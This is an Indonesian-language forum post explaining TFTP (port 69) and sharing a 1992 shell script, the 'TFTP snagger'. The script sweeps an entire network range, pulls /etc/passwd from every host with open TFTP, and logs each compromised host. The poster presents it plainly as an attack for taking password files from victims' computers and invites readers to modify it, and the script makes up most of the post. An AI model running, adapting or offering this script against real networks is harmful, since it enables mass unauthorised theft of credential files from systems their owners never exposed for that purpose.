halo kaka, mau sedikit share nih apa yang terjadi jika kita scanning port dan yang terbuka adalah port 69, yak yang pastinya TFTP yang terbuka....nah sedikit apa itu TFTP
TFTP adalah Trivial File Transfer Protocol. TFTP yang paling sering digunakan untuk
mencoba untuk ambil file password dari sistem jauh. TFTP adalah serangan sehingga
sederhana dan repetitif skrip yang ditulis secara otomatis ke proses
yang menyerang seluruh domain
dari hal diatas kita dapat mengambil file password secara paksa dari komputer korban, tapi harus kita inget ini hanya berlaku jika port yang terbuka adalah port tftp nya...service itu yang isa kita lakukan...
berikut adalah script yang kita untuk melakukan serangn tersebut...
- Code:
-
#!/bin/sh
########################################################################
# TFTP snagger by Yo
# It snags /etc/passwd files from all hosts with open 69 (tftp) port.
# scans all hosts from XX.XX.0.0 - XX.XX.255.255
# you can run it in the background in following way:
# snag [hostname] > /dev/null &
# [hostname] might be used IP # (with -ip option) as well as FQDN
# Last Updated 10/20/92
#
# Highly modified by ThePublic on 10/21/92
########################################################################
case $1 in
'')
echo " Usage: $0 [hostname] to run in the foreground "
echo " $0 [hostname] > /dev/null & to run in the background "
echo " The [hostname] can be specialized in fully qualified domain name "
echo " i.e.- $0 nyx.cs.du.edu - and it'll scan all du.edu domain. "
echo " as well as IP with -ip option. "
exit 1
;;
-ip)
if [ $2x = x ]; then
echo " Usage: $0 $1 the IP "
exit 1
else
x=`echo $2 | cut -d. -f1`
xx=`echo $2 | cut -d. -f2`
xxx=`echo $2 | cut -d. -f3`
xxxx=`echo $2 | cut -d. -f4`
# ^ field delimiter is '.' -- get field 1/2/3/4
fi;;
*)
if [ ! -f /usr/ucb/nslookup ] && [ ! -f /usr/local/bin/nslookup ]; then
# -x is for SunOs
echo sorry dude, no nslookup server .. try it with -ip option.
exit 1
fi
x1=`nslookup $1 | fgrep "Address" | cut -c11-17 | tail -1`
# ^ 7 chars ^ last line
if [ "$x1" = '' ]; then
echo " There is no such domain. Nothing to scan. Exit. "
exit 1
fi
x=`echo $x1 | cut -d. -f1` # get the first set of #, ##, or ###
xx=`echo $x1 | cut -d. -f2` # get the second set
xxx=0 # ignore the rest, if any
xxxx=0
;;
esac
if [ $x -lt 1 ] || [ $x -ge 255 ] || [ $xx -lt 1 ] || [ $xx -ge 255 ]; then
echo There is no such domain. Nothing to scan.
exit 1
fi
while [ $x -ne 255 ]; do
while [ $xx -ne 255 ]; do
while [ $xxx -ne 255 ]; do
while [ $xxxx -ne 255 ]; do
target=$x.$xx.$xxx.$xxxx
trap "echo The Process was stopped at $target;rm -rf passwd.$target; exit 1" 2
tftp << EOF
c $target
mode ascii
trace
get /etc/passwd passwd.$target
quit
EOF
if [ ! -s passwd.$target ] ; then
rm -rf passwd.$target
echo `date` $target has rejected an attempt >> .info
else
mv passwd.$target .good.$target
echo `date` $target is taken, all data is stored in .good.$target file >> .info
fi
xxxx=`expr $xxxx + 1 `
done
xxxx=0
xxx=`expr $xxx + 1 `
done
xxx=0
xx=`expr $xx + 1 `
done
xx=0
x=`expr $x + 1 `
done
muf nih yah ini masih script orang, lum sempet editnya nih.....maklum masih banyak yang harus saya perdalam di perl dulu om.....kalo ada yang mau rombak silahkan ajah yah....
